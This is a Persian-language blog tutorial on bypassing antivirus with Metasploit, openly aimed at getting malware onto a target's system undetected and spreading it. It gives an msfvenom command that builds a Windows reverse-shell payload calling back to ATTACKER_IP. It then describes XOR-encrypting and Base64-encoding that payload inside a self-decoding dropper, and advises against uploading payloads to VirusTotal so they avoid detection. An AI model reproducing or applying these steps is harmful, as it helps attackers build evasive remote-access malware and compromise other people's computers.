آموزش بایپس آنتی ویروس
- کورش سنایی
- ۱۸ آذر ۱۴۰۳
- زمان مطالعه: 4 دقیقه
خیلی خوش اومدید به آموزش بایپس آنتی ویروس با کمک متا اسپلویت که خوب اگر کاربر زیرزمین سایبری باشید میدونید که یک رشته محتوای آموزشی داریم به صورت رایگان در مورد بایپس آنتی ویروس که شمارو از پایه با آنتی ویروس آشنا کردیم و یواش یواش وارد فاز عملی بایپس آنتی ویروس میشیم . با تماشای این آموزش و آموزش های بعدی و یکم خلاقیت خودتون در آینده ای نه چندان دور موفق به باپیس آنتی ویروس میشید 🙂
چرا باید AntiVirus رو دور بزنیم ؟
هر بار که بخواین و یا قصد داشته باشید که یک برنامه مخرب رو وارد سیستم هدفتون کنید طبیعتا با مشکل مواجه میشید چرا چون ویندوز دیفندر و . . . به شما اجازه دانلود و یا اجرای اون نرم افزار رو نمیدن و به شما اطلاع میدن که این نرم افزار یک بد افزاره و از اجرا کردنش خود داری کنید اما خوب 🙂 دلیل نمیشه که ما هم بیخیال بشیم . با استفاده از یک سری تکنیک ها و ترکیب کردنشون به راحتی آنتی ویروس رو دور بزنیم و بد افزارمون رو پخش کنیم البته توجه داشته باشید که در این آموزش ما فقط از 2 تکنیک Encdoing و Encryptin برای BYpass و دور زدن آنتی ویروس استفاده میکنیم حالا تکنیکای دیگه هم هست که بهتون یاد میدم 🙂
بایپس آنتی ویروس
موتور های آنتی ویروس امروزی روش های مختلفی برای شناسایی بد افزار ها دارند و به شدت پیشرفته شدند اما هکرها همیشه 1 قدم جلو هستند و با خلاقیت خودشون میتونن به راحتی آنتی ویروس رو باپیس کنن منظور ما از بایپس آنتی ویروس پیدا کردن روشی برای فرار از دست موتور های آنتی ویروس هست که در نهایت بتونیم بدون این که شناسایی بشیم بتونیم بد افزار خودمون رو وارد سیستم هدفمون بکنیم .
اموزش ویدیویی Bypass آنتی ویروس
ساخت ShellCode برای بایپس آنتی ویروس
در این آموزش بایپس آنتی ویروس یک روش به شما آموزش میدیم که بتونید باهاش با روش بایپس آنتی ویروس آشنا بشید که خوب هنوز اگر خوب بر روی این مورد کار کنید نتیجه مطلوبی میگیرید. توجه داشته باشید که اگر بخواین در ساخت ShellCode حرفه ای بشید و به راحتی در واقع خیلییی راحت تر آنتی ویروس رو دور بزنید باید تخصصی بالایی در زبان Assembly داشته باشید 🙂 که خوب کار ساده ای نیست و برای افرادی که هنوز مهارت برنامه نویسی بالایی ندارن میتونیم فعلا از متااسپلویت استفاده کنیم حالا چطوری ؟ اگر کار با متااسپلویت هم بلد نیستید میتونید از دوره جونیور هکر یا ابزار های ضروری کالی لینوکس استفاده کنید .
//با استفاده از این قطعه کد یک Shell Code ایجاد کنید
msfvenom LHOST=ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp
Encrypt پیلود برای دور زدن آنتی ویروس
این آموزش متنی کاملا مشابه ویدیوی بالا هست که خوب بعد از ساخت ShellCode و اضافه کردنش به قطعه کدی که در باکس دانلود میزارم براتون مثل ویدیو اقدام به Encrypt کردن Payload برای دور زدن آنتی ویروس کنید که البته این تکنیک به تنهایی کافی نیست و باید با Encoding هم ترکیبش کنیم که کمی سخت تر بشه و خوب آره آنتی ویروس کارش سخت تر میشه قبلا هم Encoding رو به شما معرفی کرده بودیم که همینطور Encrypting که خوب این 2 رو فقط شفاهی کار کرده بودیم و الان قراره عملی کار کنیم 🙂 پس قراره Payload رو قراره با Xor اینکریپت کنیم با یک کلید اختصاصی و در نهایت اون رو به Base64 Encode میکنیم تا سعی کنیم آنتی ویروس رو دور بزنیم .
هماهنگ سازی Dropper با Payload برای Bypass AntiVirus
در نهایت یک فایل خواهیم داشت که کارش این هست که وقتی فایل رو خواست اجرا کنه تمام این مراحل رو بر عکس جلو بره بهش میگیم Self-decoding یعنی اول بیاد فایل رو Decode کنه و بعد از حالت Xor خارج بشه و نتیجه مطلوبمون رو بگیریم و توجه داشته باشید که Payload هاتون رو در جاهایی مثل VirusTotal آپلود نکنید البته اگر میکنید هم هرچی میرید جلوتر نکنید 🙂 باشه ؟
نتیجه گیری بایپس آنتی ویروس
ببینید یکی 2 تا روش نیست بایپس آنتی ویروس ولی خوب این روش حتما به کارتون میاد و نتیجه میده بهتون با خلاقیت خودتون و بعد از این میتونید درک کنید که باید چیکار کنید و وقتی که با تکنیک های بعدی مثل packer ها اشنا تون کنم کار خیلی ساده تر هم میشه پس در سایت ثبت نام کنید و منتظر مقالات آموزش بایپس آنتی ویروس جدید ما باشید .
